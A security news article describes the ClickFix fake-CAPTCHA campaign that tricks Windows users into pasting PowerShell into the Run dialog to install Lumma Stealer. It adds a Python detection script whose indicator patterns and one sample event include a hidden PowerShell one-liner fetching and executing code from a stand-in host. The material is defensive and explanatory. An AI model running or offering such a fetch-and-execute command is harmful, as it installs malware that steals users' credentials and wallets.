A new warning as we approach the weekend, that a “global attack” is now targeting Windows users in many countries around the world. The campaign is stupidly simple, but it poses a risk to hundreds of millions of Windows 10 users headed for a world without security updates a year from now.
Last month, Palo Alto Networks’ Unit 42 pointed out the danger of fake CAPTCHA pages, although the warning generated little attention at the time; a video posted on X by researcher John Hammond helped raise awareness. Now researchers at McAfee have issued a new warning about the fake CAPTCHA popups doing the rounds.
These attacks should be easy to detect, but they are proving effective nonetheless. The fake challenges are designed to distribute Lumma Stealer. As Unit 42 explained: “These pages have a button that, when clicked, displays instructions to victims to paste the PowerShell script into a Run window. This PowerShell copy/paste script retrieves and executes a Windows EXE malware for Lumma Stealer. The associated Lumma Stealer EXE files retrieve and use zip files that do not appear to be inherently malicious themselves.”
In its new report, McAfee now warns that the ClickFix infection chain works by tricking users into clicking buttons such as “Make sure you’re human” or “I’m not a robot.” “Once clicked, a malicious script is copied to the user’s clipboard. Users are then tricked into pasting the script after pressing the Windows key + R, unknowingly running the malware. This deception method facilitates the infection process, making it easier for attackers to develop malware.”
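Because the chain hinges on a command pasted into the Win+R Run dialog, a defender can hunt for the resulting process-creation pattern: a script host spawned by explorer.exe with a hidden window, a remote fetch and in-memory execution on its command line. The Python below is an added example, not code from McAfee or Unit 42; it assumes Sysmon Event ID 1 style field names, and the sample events, weights and alert threshold are constructed for illustration.

```python
import re

# explorer.exe hosts the Win+R Run dialog, so a script host with that parent is
# consistent with a pasted command. Assumes Sysmon Event ID 1 style field names.
RUN_DIALOG_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Weighted command-line indicators for the chain the reports describe:
# hidden window, remote fetch, in-memory execution, common evasion switches.
INDICATORS = [
    (r"-w(?:indowstyle)?\s+hidden", 2, "hidden window"),
    (r"invoke-webrequest|\biwr\b|downloadstring|net\.webclient|\bcurl\b", 3, "remote fetch"),
    (r"invoke-expression|\biex\b", 3, "execute fetched content"),
    (r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 2, "encoded command"),
    (r"-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass", 1, "policy bypass"),
]

def score_event(event):
    """Return (score, reasons) for one process-creation event dict."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    if image not in SCRIPT_HOSTS:
        return 0, []
    score, reasons = 0, []
    if parent in RUN_DIALOG_PARENTS:
        score += 2
        reasons.append("launched from Run dialog (explorer.exe parent)")
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, cmd, re.IGNORECASE):
            score += weight
            reasons.append(label)
    return score, reasons

def find_clickfix(events, threshold=6):
    """Return (event, score, reasons) for events at or above the threshold."""
    scored = [(e, *score_event(e)) for e in events]
    return [hit for hit in scored if hit[1] >= threshold]

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
def _ev(parent, cmd):
    return {"Image": PS, "ParentImage": parent, "CommandLine": cmd}

# Constructed samples (not real telemetry): one ClickFix-style paste, two benign launches.
SAMPLE_EVENTS = [
    _ev("C:\\Windows\\explorer.exe", "powershell -w hidden -nop -c \"iex (iwr 'http://example.invalid/v.txt').Content\""),
    _ev("C:\\Windows\\explorer.exe", "powershell Get-ChildItem C:\\Users"),
    _ev("C:\\Program Files\\Git\\bin\\bash.exe", "powershell -NoProfile -File build.ps1"),
]
```

Only the first sample crosses the threshold; an ordinary PowerShell launch from the Run dialog scores just the parent-process points, and the weights are a starting point to tune against your own telemetry.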
You get the pattern. The information-stealing malware planted on your computer will target account details and passwords as well as crypto wallets. It doesn’t look like a regular CAPTCHA, although these lures are evolving, making it harder to be sure. Even so, if alarm bells aren’t going off in your head by the time you are copying and pasting, turn off your computer and maybe take a break.
McAfee highlights two fraudulently crafted lures—targeting those who want to illegally download pirated games and software developers who worry that there might be a security problem with the code they’ve written and released.
Users searching the Internet for illegal copies of games probably have their guard up anyway; when they do search, the team says, “they may come across online forums, community posts, or public repositories that redirect them to malicious links.”
The second target group is even more insidious. “Users receive phishing emails, often targeting GitHub contributors, urging them to address a fake ‘security vulnerability.’ These emails contain links to the same fake CAPTCHA pages.”
Hudson Rock’s Infostealers site reported on the same types of attacks earlier this month, but that report also didn’t get the reception it deserved. “Since late August 2024,” the researchers warned, “attackers have been using fraudulent ‘human verification’ pages to trick users into running a malicious PowerShell script.”
“The ClickFix infection chain,” McAfee now says, “shows how cybercriminals exploit common user behaviors—such as downloading cracked software and responding to phishing emails—to distribute malware like Lumma Stealer. By exploiting fake CAPTCHA pages, attackers trick users into executing malicious scripts that bypass detection, ultimately leading to the installation of malware.”
This fake CAPTCHA attack is now becoming a thing. Be careful and take a moment when challenged to check for any signs of compromise. It won’t always be as obvious as it is here, and such attacks will evolve and become more difficult to detect. Certainly, you should never cut, paste and run anything in order to get through a CAPTCHA.
In the meantime, this is yet another timely warning to Windows 10 users that whatever they do between now and October next year, losing support shouldn’t be one of them. If Microsoft doesn’t offer extended support options at a reasonable price, and the alternatives don’t fully fill the void, you should move on to Windows 11.